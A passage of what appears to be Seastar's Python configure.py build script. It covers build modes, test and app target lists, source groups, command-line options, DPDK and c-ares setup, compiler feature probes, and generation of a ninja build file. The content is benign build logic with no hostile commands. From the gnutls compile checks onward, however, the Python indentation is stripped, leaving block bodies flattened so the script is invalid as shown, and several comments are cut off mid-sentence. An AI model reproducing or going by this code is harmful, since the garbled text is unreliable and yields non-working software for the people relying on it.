        'sanitize_libs': '-lasan -lubsan',
        'opt': '-O0 -DDEBUG -DDEBUG_SHARED_PTR -DDEFAULT_ALLOCATOR -DSEASTAR_THREAD_STACK_GUARDS -DNO_EXCEPTION_HACK',
        'libs': '',
        'cares_opts': '-DCARES_STATIC=ON -DCARES_SHARED=OFF -DCMAKE_BUILD_TYPE=Debug',
    },
    'release': {
        'sanitize': '',
        'sanitize_libs': '',
        'opt': '-O2 -DNDEBUG -DDEFAULT_ALLOCATOR',
        'libs': '',
        'cares_opts': '-DCARES_STATIC=ON -DCARES_SHARED=OFF -DCMAKE_BUILD_TYPE=Release',
    },
}
# Test binaries (relative paths that become ninja targets per mode).
tests = [
    'tests/fileiotest',
    'tests/directory_test',
    'tests/linecount',
    'tests/echotest',
    'tests/l3_test',
    'tests/ip_test',
    'tests/timertest',
    'tests/tcp_test',
    'tests/futures_test',
    'tests/alloc_test',
    'tests/foreign_ptr_test',
    'tests/smp_test',
    'tests/thread_test',
    'tests/thread_context_switch',
    'tests/udp_server',
    'tests/udp_client',
    'tests/blkdiscard_test',
    'tests/sstring_test',
    'tests/unwind_test',
    'tests/defer_test',
    'tests/httpd',
    'tests/memcached/test_ascii_parser',
    'tests/tcp_sctp_server',
    'tests/tcp_sctp_client',
    'tests/allocator_test',
    'tests/output_stream_test',
    'tests/udp_zero_copy',
    'tests/shared_ptr_test',
    'tests/weak_ptr_test',
    'tests/checked_ptr_test',
    'tests/slab_test',
    'tests/fstream_test',
    'tests/distributed_test',
    'tests/rpc',
    'tests/semaphore_test',
    'tests/expiring_fifo_test',
    'tests/packet_test',
    'tests/tls_test',
    'tests/fair_queue_test',
    'tests/rpc_test',
    'tests/connect_test',
    'tests/chunked_fifo_test',
    'tests/circular_buffer_test',
    'tests/perf/perf_fstream',
    'tests/json_formatter_test',
    'tests/dns_test',
    'tests/execution_stage_test',
    'tests/lowres_clock_test',
    'tests/program_options_test',
    'tests/tuple_utils_test',
    'tests/tls_echo_server',
    'tests/tls_simple_client',
    'tests/circular_buffer_fixed_capacity_test',
    'tests/noncopyable_function_test',
    ]
# Sample / benchmark applications built alongside the library.
apps = [
    'apps/httpd/httpd',
    'apps/seawreck/seawreck',
    'apps/fair_queue_tester/fair_queue_tester',
    'apps/memcached/memcached',
    'apps/iotune/iotune',
    'tests/scheduling_group_demo',
    ]
all_artifacts = apps + tests + ['libseastar.a', 'seastar.pc']
# Command-line interface.  Note that tristate options (hwloc, exception
# workaround) default to None so they can be auto-detected later.
arg_parser = argparse.ArgumentParser('Configure seastar')
arg_parser.add_argument('--static', dest = 'static', action = 'store_const', default = '',
                        const = '-static',
                        help = 'Static link (useful for running on hosts outside the build environment)')
arg_parser.add_argument('--embedded-static', dest = 'embedded_static', action = 'store_const', default = '',
                        const = '-embedded-static',
                        help = 'Static link with -fPIC (can be embedded in a shared library)')
arg_parser.add_argument('--pie', dest = 'pie', action = 'store_true',
                        help = 'Build position-independent executable (PIE)')
arg_parser.add_argument('--so', dest = 'so', action = 'store_true',
                        help = 'Build shared object (SO) instead of executable')
arg_parser.add_argument('--mode', action='store', choices=list(modes.keys()) + ['all'], default='all')
arg_parser.add_argument('--with', dest='artifacts', action='append', choices=all_artifacts, default=[])
arg_parser.add_argument('--cflags', action = 'store', dest = 'user_cflags', default = '',
                        help = 'Extra flags for the C++ compiler')
arg_parser.add_argument('--ldflags', action = 'store', dest = 'user_ldflags', default = '',
                        help = 'Extra flags for the linker')
arg_parser.add_argument('--compiler', action = 'store', dest = 'cxx', default = 'g++',
                        help = 'C++ compiler path')
arg_parser.add_argument('--c-compiler', action='store', dest='cc', default='gcc',
                        help = 'C compiler path (for bundled libraries such as dpdk and c-ares)')
arg_parser.add_argument('--with-osv', action = 'store', dest = 'with_osv', default = '',
                        help = 'Shortcut for compile for OSv')
arg_parser.add_argument('--enable-dpdk', action = 'store_true', dest = 'dpdk', default = False,
                        help = 'Enable dpdk (from included dpdk sources)')
arg_parser.add_argument('--dpdk-target', action = 'store', dest = 'dpdk_target', default = '',
                        help = 'Path to DPDK SDK target location (e.g. <DPDK SDK dir>/x86_64-native-linuxapp-gcc)')
arg_parser.add_argument('--debuginfo', action = 'store', dest = 'debuginfo', type = int, default = 1,
                        help = 'Enable(1)/disable(0)compiler debug information generation')
arg_parser.add_argument('--tests-debuginfo', action='store', dest='tests_debuginfo', type=int, default=0,
                        help='Enable(1)/disable(0)compiler debug information generation for tests')
arg_parser.add_argument('--static-stdc++', dest = 'staticcxx', action = 'store_true',
                        help = 'Link libgcc and libstdc++ statically')
arg_parser.add_argument('--static-boost', dest = 'staticboost', action = 'store_true',
                        help = 'Link with boost statically')
add_tristate(arg_parser, name = 'hwloc', dest = 'hwloc', help = 'hwloc support')
arg_parser.add_argument('--enable-gcc6-concepts', dest='gcc6_concepts', action='store_true', default=False,
                        help='enable experimental support for C++ Concepts as implemented in GCC 6')
add_tristate(arg_parser, name = 'exception-scalability-workaround', dest='exception_workaround',
             help='disabling override of dl_iterate_phdr symbol to workaround C++ exception scalability issues')
arg_parser.add_argument('--allocator-page-size', dest='allocator_page_size', type=int, help='override allocator page size')
args = arg_parser.parse_args()
# Sources for seastar's native (userspace) networking stack.
libnet = [
    'net/proxy.cc',
    'net/virtio.cc',
    'net/dpdk.cc',
    'net/ip.cc',
    'net/ethernet.cc',
    'net/arp.cc',
    'net/native-stack.cc',
    'net/ip_checksum.cc',
    'net/udp.cc',
    'net/tcp.cc',
    'net/dhcp.cc',
    'net/tls.cc',
    'net/dns.cc',
    ]
# Core runtime sources linked into every artifact.
core = [
    'core/reactor.cc',
    'core/systemwide_memory_barrier.cc',
    'core/fstream.cc',
    'core/posix.cc',
    'core/memory.cc',
    'core/resource.cc',
    'core/scollectd.cc',
    'core/metrics.cc',
    'core/app-template.cc',
    'core/thread.cc',
    'core/dpdk_rte.cc',
    'core/fsqual.cc',
    'util/conversions.cc',
    'util/program-options.cc',
    'util/log.cc',
    'util/backtrace.cc',
    'net/packet.cc',
    'net/posix-stack.cc',
    'net/net.cc',
    'net/stack.cc',
    'net/inet_address.cc',
    'rpc/rpc.cc',
    'rpc/lz4_compressor.cc',
    'core/exception_hacks.cc',
    ]
# Protocol-buffer schemas compiled via the 'protobuf' ninja rule.
protobuf = [
    'proto/metrics2.proto',
    ]
# HTTP server sources (includes a ragel-generated request parser).
http = ['http/transformers.cc',
        'http/json_path.cc',
        'http/file_handler.cc',
        'http/common.cc',
        'http/routes.cc',
        'json/json_elements.cc',
        'json/formatter.cc',
        'http/matcher.cc',
        'http/mime_types.cc',
        'http/httpd.cc',
        'http/reply.cc',
        'http/request_parser.rl',
        'http/api_docs.cc',
        ]
# Shared scaffolding linked into every boost-unit-test binary.
boost_test_lib = [
    'tests/test-utils.cc',
    'tests/test_runner.cc',
    ]
def maybe_static(flag, libs):
    """Wrap `libs` in a -Wl,-Bstatic/-Bdynamic bracket when static linking
    of those libraries was requested and the build is not already fully
    static (in which case everything is static anyway)."""
    want_static_wrap = flag and not args.static
    if not want_static_wrap:
        return libs
    return '-Wl,-Bstatic {} -Wl,-Bdynamic'.format(libs)
defines = ['FMT_HEADER_ONLY']
# Baseline link line shared by all artifacts; boost pieces may be wrapped
# for static linking by maybe_static().
libs = ' '.join(['-laio',
                 maybe_static(args.staticboost,
                              '-lboost_program_options -lboost_system -lboost_filesystem'),
                 '-lstdc++ -lm',
                 maybe_static(args.staticboost, '-lboost_thread'),
                 '-lcryptopp -lrt -lgnutls -lgnutlsxx -llz4 -lprotobuf -ldl -lgcc_s -lunwind',
                 ])
boost_unit_test_lib = maybe_static(args.staticboost, '-lboost_unit_test_framework')
hwloc_libs = '-lhwloc -lnuma -lpciaccess -lxml2 -lz'
if args.gcc6_concepts:
    defines.append('HAVE_GCC6_CONCEPTS')
    args.user_cflags += ' -fconcepts'
# The dl_iterate_phdr exception-scalability workaround is incompatible with
# static libgcc/libstdc++ linkage.
if not apply_tristate(args.exception_workaround, test = lambda: not args.staticcxx and not args.static,
                      note = "Note: disabling exception scalability workaround due to static linkage of libgcc and libstdc++",
                      missing = "Error: cannot enable exception scalability workaround with static linkage of libgcc and libstdc++"):
    defines.append('NO_EXCEPTION_HACK')
if args.staticcxx:
    libs = libs.replace('-lstdc++', '')
    libs += ' -static-libgcc -static-libstdc++'
if args.staticcxx or args.static:
    defines.append("NO_EXCEPTION_INTERCEPT");
# memcached shares its ragel-generated ASCII parser between the app and its test.
memcache_base = [
    'apps/memcached/ascii.rl'
    ] + libnet + core
# Maps each build artifact to the source files it is built from; consumed
# by the ninja-generation loop.
deps = {
    'libseastar.a' : core + libnet + http,
    'seastar.pc': [],
    'apps/httpd/httpd': ['apps/httpd/demo.json', 'apps/httpd/main.cc'] + http + libnet + core,
    'apps/memcached/memcached': ['apps/memcached/memcache.cc'] + memcache_base,
    'tests/memcached/test_ascii_parser': ['tests/memcached/test_ascii_parser.cc'] + memcache_base,
    'tests/fileiotest': ['tests/fileiotest.cc'] + core,
    'tests/directory_test': ['tests/directory_test.cc'] + core,
    'tests/linecount': ['tests/linecount.cc'] + core,
    'tests/echotest': ['tests/echotest.cc'] + core + libnet,
    'tests/l3_test': ['tests/l3_test.cc'] + core + libnet,
    'tests/ip_test': ['tests/ip_test.cc'] + core + libnet,
    'tests/tcp_test': ['tests/tcp_test.cc'] + core + libnet,
    'tests/timertest': ['tests/timertest.cc'] + core,
    'tests/futures_test': ['tests/futures_test.cc'] + core,
    'tests/alloc_test': ['tests/alloc_test.cc'] + core,
    'tests/foreign_ptr_test': ['tests/foreign_ptr_test.cc'] + core,
    'tests/semaphore_test': ['tests/semaphore_test.cc'] + core,
    'tests/expiring_fifo_test': ['tests/expiring_fifo_test.cc'] + core,
    'tests/smp_test': ['tests/smp_test.cc'] + core,
    'tests/thread_test': ['tests/thread_test.cc'] + core,
    'tests/thread_context_switch': ['tests/thread_context_switch.cc'] + core,
    'tests/udp_server': ['tests/udp_server.cc'] + core + libnet,
    'tests/udp_client': ['tests/udp_client.cc'] + core + libnet,
    'tests/tcp_sctp_server': ['tests/tcp_sctp_server.cc'] + core + libnet,
    'tests/tcp_sctp_client': ['tests/tcp_sctp_client.cc'] + core + libnet,
    'tests/tls_test': ['tests/tls_test.cc'] + core + libnet,
    'tests/fair_queue_test': ['tests/fair_queue_test.cc'] + core,
    'apps/seawreck/seawreck': ['apps/seawreck/seawreck.cc', 'http/http_response_parser.rl'] + core + libnet,
    'apps/fair_queue_tester/fair_queue_tester': ['apps/fair_queue_tester/fair_queue_tester.cc'] + core,
    'apps/iotune/iotune': ['apps/iotune/iotune.cc'] + ['core/resource.cc', 'core/fsqual.cc'],
    'tests/blkdiscard_test': ['tests/blkdiscard_test.cc'] + core,
    'tests/sstring_test': ['tests/sstring_test.cc'] + core,
    'tests/unwind_test': ['tests/unwind_test.cc'] + core,
    'tests/defer_test': ['tests/defer_test.cc'] + core,
    'tests/httpd': ['tests/httpd.cc'] + http + core,
    'tests/allocator_test': ['tests/allocator_test.cc'] + core,
    'tests/output_stream_test': ['tests/output_stream_test.cc'] + core + libnet,
    'tests/udp_zero_copy': ['tests/udp_zero_copy.cc'] + core + libnet,
    'tests/shared_ptr_test': ['tests/shared_ptr_test.cc'] + core,
    'tests/weak_ptr_test': ['tests/weak_ptr_test.cc'] + core,
    'tests/checked_ptr_test': ['tests/checked_ptr_test.cc'] + core,
    'tests/slab_test': ['tests/slab_test.cc'] + core,
    'tests/fstream_test': ['tests/fstream_test.cc'] + core,
    'tests/distributed_test': ['tests/distributed_test.cc'] + core,
    'tests/rpc': ['tests/rpc.cc'] + core + libnet,
    'tests/rpc_test': ['tests/rpc_test.cc'] + core + libnet,
    'tests/packet_test': ['tests/packet_test.cc'] + core + libnet,
    'tests/connect_test': ['tests/connect_test.cc'] + core + libnet,
    'tests/chunked_fifo_test': ['tests/chunked_fifo_test.cc'] + core,
    'tests/circular_buffer_test': ['tests/circular_buffer_test.cc'] + core,
    'tests/perf/perf_fstream': ['tests/perf/perf_fstream.cc'] + core,
    'tests/json_formatter_test': ['tests/json_formatter_test.cc'] + core + http,
    'tests/dns_test': ['tests/dns_test.cc'] + core + libnet,
    'tests/execution_stage_test': ['tests/execution_stage_test.cc'] + core,
    'tests/lowres_clock_test': ['tests/lowres_clock_test.cc'] + core,
    'tests/program_options_test': ['tests/program_options_test.cc'] + core,
    'tests/tuple_utils_test': ['tests/tuple_utils_test.cc'],
    'tests/tls_echo_server': ['tests/tls_echo_server.cc'] + core + libnet,
    'tests/tls_simple_client': ['tests/tls_simple_client.cc'] + core + libnet,
    'tests/circular_buffer_fixed_capacity_test': ['tests/circular_buffer_fixed_capacity_test.cc'],
    'tests/scheduling_group_demo': ['tests/scheduling_group_demo.cc'] + core,
    'tests/noncopyable_function_test': ['tests/noncopyable_function_test.cc'],
}
# Tests that use the boost unit-test framework; they additionally get
# boost_test_lib appended to their sources below.
boost_tests = [
    'tests/memcached/test_ascii_parser',
    'tests/fileiotest',
    'tests/futures_test',
    'tests/alloc_test',
    'tests/foreign_ptr_test',
    'tests/semaphore_test',
    'tests/expiring_fifo_test',
    'tests/thread_test',
    'tests/tls_test',
    'tests/fair_queue_test',
    'tests/httpd',
    'tests/output_stream_test',
    'tests/fstream_test',
    'tests/rpc_test',
    'tests/connect_test',
    'tests/json_formatter_test',
    'tests/dns_test',
    'tests/execution_stage_test',
    'tests/lowres_clock_test',
    ]
# Boost-based tests link the shared test scaffolding in addition to their
# own sources.
for bt in boost_tests:
    deps[bt] += boost_test_lib
# Warning suppressions; entries not understood by the chosen compiler are
# filtered out later via warning_supported().
warnings = [
    '-Wno-mismatched-tags',
    '-Wno-pessimizing-move',
    '-Wno-redundant-move',
    '-Wno-inconsistent-missing-override',
    '-Wno-unused-private-field',
    '-Wno-unknown-attributes',
    '-Wno-unneeded-internal-declaration',
    '-Wno-undefined-inline',
    '-Wno-overloaded-virtual',
    '-Wno-maybe-uninitialized',
    '-Wno-sign-compare',
    ]
# "--with-osv" implies a shared-object build without hwloc, with OSv
# headers and the default allocator.
if args.with_osv:
    args.so = True
    args.hwloc = False
    args.user_cflags = (args.user_cflags +
        ' -DDEFAULT_ALLOCATOR -fvisibility=default -DHAVE_OSV -I' +
        args.with_osv + ' -I' + args.with_osv + '/include -I' +
        args.with_osv + '/arch/x64')
if args.allocator_page_size:
    args.user_cflags += ' -DSEASTAR_OVERRIDE_ALLOCATOR_PAGE_SIZE=' + str(args.allocator_page_size)
# gcc -march= CPU name -> DPDK machine name.
dpdk_arch_xlat = {
    'native': 'native',
    'nehalem': 'nhm',
    'westmere': 'wsm',
    'sandybridge': 'snb',
    'ivybridge': 'ivb',
    }
dpdk_machine = 'native'
if args.dpdk:
    if not os.path.exists('dpdk') or not os.listdir('dpdk'):
        raise Exception('--enable-dpdk: dpdk/ is empty. Run "git submodule update --init".')
    cflags = args.user_cflags.split()
    dpdk_machine = ([dpdk_arch_xlat[cflag[7:]]
                     for cflag in cflags
                     if cflag.startswith('-march')] or ['native'])[0]
    # NOTE(review): .format passes dpdk_machine but the command string has
    # no '{dpdk_machine}' placeholder — possibly a lost placeholder; verify
    # against upstream.
    subprocess.check_call('make -C dpdk RTE_OUTPUT=$PWD/build/dpdk/ config T=x86_64-native-linuxapp-gcc'.format(
        dpdk_machine=dpdk_machine),
        shell = True)
    dotconfig = 'build/dpdk/.config'
    lines = open(dotconfig, encoding='UTF-8').readlines()
    def update(lines, vars):
        # Rewrite 'VAR=value' assignments in a Kconfig-style line list.
        ret = []
        for line in lines:
            for var, val in vars.items():
                if line.startswith(var + '='):
                    line = var + '=' + val + '\n'
            ret.append(line)
        return ret
    # NOTE(review): 'CONFIG_RTE_LIBRTE_IP_FRAG' appears twice in this dict
    # literal; the second occurrence silently wins (same value here).
    lines = update(lines, {'CONFIG_RTE_LIBRTE_PMD_BOND': 'n',
                           'CONFIG_RTE_MBUF_SCATTER_GATHER': 'n',
                           'CONFIG_RTE_LIBRTE_IP_FRAG': 'n',
                           'CONFIG_RTE_APP_TEST': 'n',
                           'CONFIG_RTE_TEST_PMD': 'n',
                           'CONFIG_RTE_MBUF_REFCNT_ATOMIC': 'n',
                           'CONFIG_RTE_MAX_MEMSEG': '8192',
                           'CONFIG_RTE_EAL_IGB_UIO': 'n',
                           'CONFIG_RTE_LIBRTE_KNI': 'n',
                           'CONFIG_RTE_KNI_KMOD': 'n',
                           'CONFIG_RTE_LIBRTE_JOBSTATS': 'n',
                           'CONFIG_RTE_LIBRTE_LPM': 'n',
                           'CONFIG_RTE_LIBRTE_ACL': 'n',
                           'CONFIG_RTE_LIBRTE_POWER': 'n',
                           'CONFIG_RTE_LIBRTE_IP_FRAG': 'n',
                           'CONFIG_RTE_LIBRTE_METER': 'n',
                           'CONFIG_RTE_LIBRTE_SCHED': 'n',
                           'CONFIG_RTE_LIBRTE_DISTRIBUTOR': 'n',
                           'CONFIG_RTE_LIBRTE_PMD_CRYPTO_SCHEDULER': 'n',
                           'CONFIG_RTE_LIBRTE_REORDER': 'n',
                           'CONFIG_RTE_LIBRTE_PORT': 'n',
                           'CONFIG_RTE_LIBRTE_TABLE': 'n',
                           'CONFIG_RTE_LIBRTE_PIPELINE': 'n',
                           })
    # NOTE(review): 'lines' is a list, so '+=' with a string extends it one
    # character per element; writelines() then concatenates the characters,
    # which works by accident but leaves no trailing newline.  Consider
    # lines.append('CONFIG_RTE_MACHINE={}\n'.format(dpdk_machine)).
    lines += 'CONFIG_RTE_MACHINE={}'.format(dpdk_machine)
    open(dotconfig, 'w', encoding='UTF-8').writelines(lines)
    args.dpdk_target = os.getcwd() + '/build/dpdk'
if args.dpdk_target:
    args.user_cflags = (args.user_cflags +
        ' -DHAVE_DPDK -I' + args.dpdk_target + '/include ' +
        dpdk_cflags(args.dpdk_target) +
        ' -Wno-error=literal-suffix -Wno-literal-suffix -Wno-invalid-offsetof')
    libs += (' -L' + args.dpdk_target + '/lib ')
    if args.with_osv:
        libs += '-lintel_dpdk -lrt -lm -ldl'
    else:
        libs += '-Wl,--whole-archive -lrte_pmd_vmxnet3_uio -lrte_pmd_i40e -lrte_pmd_ixgbe -lrte_pmd_e1000 -lrte_pmd_ring -lrte_pmd_bnxt -lrte_pmd_cxgbe -lrte_pmd_ena -lrte_pmd_enic -lrte_pmd_fm10k -lrte_pmd_nfp -lrte_pmd_qede -lrte_pmd_sfc_efx -lrte_hash -lrte_kvargs -lrte_mbuf -lrte_ethdev -lrte_eal -lrte_mempool -lrte_mempool_ring -lrte_ring -lrte_cmdline -lrte_cfgfile -Wl,--no-whole-archive -lrt -lm -ldl'
args.user_cflags += ' -I{srcdir}/fmt'.format(**globals())
if not args.staticboost:
    args.user_cflags += ' -DBOOST_TEST_DYN_LINK'
warnings = [w
for w in warnings
if warning_supported(warning = w, compiler = args.cxx)]
warnings = ' '.join(warnings)
dbgflag = debug_flag(args.cxx) if args.debuginfo else ''
tests_link_rule = 'link' if args.tests_debuginfo else 'link_stripped'
sanitize_flags = sanitize_vptr_flag(args.cxx)
visibility_flags = adjust_visibility_flags(args.cxx)
visibility_flags = '-fvisibility=hidden ' + visibility_flags
if not try_compile(args.cxx, '#include <gnutls/gnutls.h>'):
print('Seastar requires gnutls. Install gnutls-devel/libgnutls-dev')
sys.exit(1)
if not try_compile(args.cxx, '#include <gnutls/gnutls.h>\nint x = GNUTLS_NONBLOCK;'):
print('Seastar requires gnutls >= 2.8. Install libgnutls28-dev or later.')
sys.exit(1)
if not try_compile(args.cxx, '#include <experimental/string_view>', ['-std=gnu++1y']):
print('Seastar requires g++ >= 4.9. Install g++-4.9 or later (use --compiler option).')
sys.exit(1)
if not try_compile(args.cxx, '''#include <boost/version.hpp>\n\
#if BOOST_VERSION < 105500\n\
#error "Invalid boost version"\n\
#endif'''):
print("Seastar requires boost >= 1.55")
sys.exit(1)
modes['debug']['sanitize'] += ' ' + sanitize_flags
def have_hwloc():
    # Probe whether the hwloc and numa development headers are installed.
    probe = '#include <hwloc.h>\n#include <numa.h>'
    return try_compile(source = probe, compiler = args.cxx)
if apply_tristate(args.hwloc, test = have_hwloc,
note = 'Note: hwloc-devel/numactl-devel not installed. No NUMA support.',
missing = 'Error: required packages hwloc-devel/numactl-devel not installed.'):
libs += ' ' + hwloc_libs
defines.append('HAVE_HWLOC')
defines.append('HAVE_NUMA')
if try_compile(args.cxx, source = textwrap.dedent('''\
#include <lz4.h>
void m() {
LZ4_compress_default(static_cast<const char*>(0), static_cast<char*>(0), 0, 0);
}
''')):
defines.append("HAVE_LZ4_COMPRESS_DEFAULT")
if try_compile_and_link(args.cxx, flags=['-fsanitize=address'], source = textwrap.dedent('''\
#include <cstddef>
extern "C" {
void __sanitizer_start_switch_fiber(void**, const void*, size_t);
void __sanitizer_finish_switch_fiber(void*, const void**, size_t*);
}
int main() {
__sanitizer_start_switch_fiber(nullptr, nullptr, 0);
__sanitizer_finish_switch_fiber(nullptr, nullptr, nullptr);
}
''')):
defines.append("HAVE_ASAN_FIBER_SUPPORT")
if args.embedded_static:
args.pie = ''
args.fpie = '-fPIC'
visibility_flags = visibility_flags.replace('-fvisibility=hidden ', '')
modes[args.mode]['cares_opts'] += ' -DCMAKE_C_FLAGS=-fPIC'
elif args.so:
args.pie = '-shared'
args.fpie = '-fpic'
elif args.pie:
args.pie = '-pie'
args.fpie = '-fpie'
else:
args.pie = ''
args.fpie = ''
defines = ' '.join(['-D' + d for d in defines])
globals().update(vars(args))
total_memory = os.sysconf('SC_PAGE_SIZE') * os.sysconf('SC_PHYS_PAGES')
link_pool_depth = max(int(total_memory / 7e9), 1)
build_modes = modes if args.mode == 'all' else [args.mode]
build_artifacts = all_artifacts if not args.artifacts else args.artifacts
dpdk_sources = []
if args.dpdk:
for root, dirs, files in os.walk('dpdk'):
dpdk_sources += [os.path.join(root, file)
for file in files
if file.endswith('.h') or file.endswith('.c')]
dpdk_sources = ' '.join(dpdk_sources)
cares_dir = 'c-ares'
cares_lib = 'cares-seastar'
cares_src_lib = cares_dir + '/lib/libcares.a'
if not os.path.exists(cares_dir) or not os.listdir(cares_dir):
raise Exception(cares_dir + ' is empty. Run "git submodule update --init".')
cares_sources = []
for root, dirs, files in os.walk('c-ares'):
cares_sources += [os.path.join(root, file)
for file in files
if file.endswith('.h') or file.endswith('.c')]
cares_sources = ' '.join(cares_sources)
libs += ' -l' + cares_lib
# of libraries which are targets built here. These libraries are all relative
# to the current mode's build directory.
built_libs = []
built_libs += ['lib' + cares_lib + '.a']
outdir = 'build'
buildfile = 'build.ninja'
os.makedirs(outdir, exist_ok = True)
do_sanitize = True
if args.static:
do_sanitize = False
with open(buildfile, 'w') as f:
dpdk_deps = ''
if args.dpdk:
dpdk_deps = ' {dpdk_target}/include/rte_eal.h {dpdk_target}/lib/librte_eal.a'.format(dpdk_target=args.dpdk_target)
f.write(textwrap.dedent('''\
configure_args = {configure_args}
builddir = {outdir}
full_builddir = {srcdir}/$builddir
cxx = {cxx}
# we disable _FORTIFY_SOURCE because it generates false positives with longjmp() (core/thread.cc)
cxxflags = -std=gnu++1y {dbgflag} {fpie} -Wall -Wno-unused-variable -Wno-unused-but-set-variable -Wno-error=deprecated-declarations {visibility_flags} -pthread -I{srcdir} -U_FORTIFY_SOURCE {user_cflags} {warnings} {defines}
ldflags = {dbgflag} -Wl,--no-as-needed {static} {pie} {visibility_flags} -pthread {user_ldflags}
libs = {libs}
pool link_pool
depth = {link_pool_depth}
rule ragel
# sed away a bug in ragel 7 that emits some extraneous _nfa* variables
# (the $$ is collapsed to a single one by ninja)
command = ragel -G2 -o $out $in && sed -i -e '1h;2,$$H;$$!d;g' -re 's/static const char _nfa[^;]*;//g' $out
description = RAGEL $out
rule gen
command = /bin/echo -e $text > $out
description = GEN $out
rule swagger
command = json/json2code.py -f $in -o $out
description = SWAGGER $out
rule protobuf
command = protoc --cpp_out=$outdir $in
description = PROTOC $out
rule copy_file
command = cp $in $out
''').format(**globals()))
if args.dpdk:
f.write(textwrap.dedent('''\
rule dpdkmake
command = make -C build/dpdk CC={args.cc}
build {dpdk_deps} : dpdkmake {dpdk_sources}
''').format(**globals()))
for mode in build_modes:
objdeps = {}
modeval = modes[mode]
if modeval['sanitize'] and not do_sanitize:
print('Note: --static disables debug mode sanitizers')
modeval['sanitize'] = ''
modeval['sanitize_libs'] = ''
elif modeval['sanitize']:
modeval['sanitize'] += ' -DASAN_ENABLED'
f.write(textwrap.dedent('''\
cxxflags_{mode} = {sanitize} {opt} -I$full_builddir/{mode}/gen -I$full_builddir/{mode}/c-ares
libs_{mode} = {sanitize_libs} {libs}
rule cxx.{mode}
command = $cxx -MD -MT $out -MF $out.d $cxxflags_{mode} $cxxflags -c -o $out $in
description = CXX $out
depfile = $out.d
rule link.{mode}
command = $cxx $cxxflags_{mode} -L$builddir/{mode} $ldflags -o $out $in $libs $libs_{mode} $extralibs
description = LINK $out
pool = link_pool
rule link_stripped.{mode}
command = $cxx $cxxflags_{mode} -s -L$builddir/{mode} $ldflags -o $out $in $libs $libs_{mode} $extralibs
description = LINK (stripped) $out
pool = link_pool
rule ar.{mode}
command = rm -f $out; ar cr $out $in; ranlib $out
description = AR $out
''').format(mode = mode, **modeval))
f.write('build {mode}: phony $builddir/{mode}/lib{cares_lib}.a {artifacts}\n'.format(mode = mode, cares_lib=cares_lib,
artifacts = str.join(' ', ('$builddir/' + mode + '/' + x for x in build_artifacts))))
f.write(textwrap.dedent('''\
rule caresmake_{mode}
command = make -C build/{mode}/{cares_dir} CC={args.cc}
rule carescmake_{mode}
command = mkdir -p $builddir/{mode}/{cares_dir} && cd $builddir/{mode}/{cares_dir} && CC={args.cc} cmake {cares_opts} {srcdir}/$in
build $builddir/{mode}/{cares_dir}/Makefile : carescmake_{mode} {cares_dir}
build $builddir/{mode}/{cares_dir}/ares_build.h : phony $builddir/{mode}/{cares_dir}/Makefile
build $builddir/{mode}/{cares_src_lib} : caresmake_{mode} $builddir/{mode}/{cares_dir}/Makefile | {cares_sources}
build $builddir/{mode}/lib{cares_lib}.a : copy_file $builddir/{mode}/{cares_src_lib}
''').format(cares_opts=(modeval['cares_opts']), **globals()))
objdeps['$builddir/' + mode + '/net/dns.o'] = ' $builddir/' + mode + '/' + cares_dir + '/ares_build.h'
compiles = {}
ragels = {}
swaggers = {}
protobufs = {}
for binary in build_artifacts:
srcs = deps[binary]
objs = ['$builddir/' + mode + '/' + src.replace('.cc', '.o')
for src in srcs
if src.endswith('.cc')]
objs += ['$builddir/' + mode + '/gen/' + src.replace('.proto', '.pb.o')
for src in srcs
if src.endswith('.proto')]
if binary.endswith('.pc'):
vars = modeval.copy()
vars.update(globals())
pc = textwrap.dedent('''\
Name: Seastar
URL: http://seastar-project.org/
Description: Advanced C++ framework for high-performance server applications on modern hardware.
Version: 1.0
Libs: -L$full_builddir/{mode} -Wl,--whole-archive,-lseastar,--no-whole-archive $cxxflags $cxflags_{mode} -Wl,--no-as-needed {static} {pie} {user_ldflags} {sanitize_libs} {libs}
Cflags: $cxxflags $cxxflags_{mode}
''').format(**vars)
f.write('build $builddir/{}/{}: gen\n text = {}\n'.format(mode, binary, repr(pc)))
elif binary.endswith('.a'):
f.write('build $builddir/{}/{}: ar.{} {}\n'.format(mode, binary, mode, str.join(' ', objs)))
else:
libdeps = str.join(' ', ('$builddir/{}/{}'.format(mode, i) for i in built_libs))
extralibs = []
if binary.startswith('tests/'):
if binary in boost_tests:
extralibs += [maybe_static(args.staticboost, '-lboost_unit_test_framework')]
# by many tests yields ridiculous amounts of disk space.
# So we strip the tests by default; The user can very
# quickly re-link the test unstripped by adding a "_g"
# to the test name, e.g., "ninja build/release/testname_g"
f.write('build $builddir/{}/{}: {}.{} {} | {} {}\n'.format(mode, binary, tests_link_rule, mode, str.join(' ', objs), dpdk_deps, libdeps))
f.write(' extralibs = {}\n'.format(' '.join(extralibs)))
f.write('build $builddir/{}/{}_g: link.{} {} | {} {}\n'.format(mode, binary, mode, str.join(' ', objs), dpdk_deps, libdeps))
f.write(' extralibs = {}\n'.format(' '.join(extralibs)))
else:
f.write('build $builddir/{}/{}: link.{} {} | {} {} $builddir/{}/lib{}.a\n'.format(mode, binary, mode, str.join(' ', objs), dpdk_deps, libdeps, mode, cares_lib))
for src in srcs:
if src.endswith('.cc'):
obj = '$builddir/' + mode + '/' + src.replace('.cc', '.o')
compiles[obj] = src
elif src.endswith('.proto'):
hh = '$builddir/' + mode + '/gen/' + src.replace('.proto', '.pb.h')
protobufs[hh] = src
compiles[hh.replace('.h', '.o')] = hh.replace('.h', '.cc')
elif src.endswith('.rl'):
hh = '$builddir/' + mode + '/gen/' + src.replace('.rl', '.hh')
ragels[hh] = src
elif src.endswith('.json'):
hh = '$builddir/' + mode + '/gen/' + src + '.hh'
swaggers[hh] = src
else:
raise Exception('No rule for ' + src)
for obj in compiles:
src = compiles[obj]
gen_headers = list(ragels.keys()) + list(swaggers.keys()) + list(protobufs.keys())
f.write('build {}: cxx.{} {} || {} \n'.format(obj, mode, src, ' '.join(gen_headers) + dpdk_deps + objdeps.get(obj, '')))
for hh in ragels:
src = ragels[hh]
f.write('build {}: ragel {}\n'.format(hh, src))
for hh in swaggers:
src = swaggers[hh]
f.write('build {}: swagger {} | json/json2code.py\n'.format(hh,src))
for pb in protobufs:
src = protobufs[pb]
c_pb = pb.replace('.h','.cc')
outd = os.path.dirname(os.path.dirname(pb))
f.write('build {} {}: protobuf {}\n outdir = {}\n'.format(c_pb, pb, src, outd))
f.write(textwrap.dedent('''\
rule configure
command = python3 configure.py $configure_args
generator = 1
build build.ninja: configure | configure.py
rule cscope
command = find -name '*.[chS]' -o -name "*.cc" -o -name "*.hh" | cscope -bq -i-
description = CSCOPE
build cscope: cscope
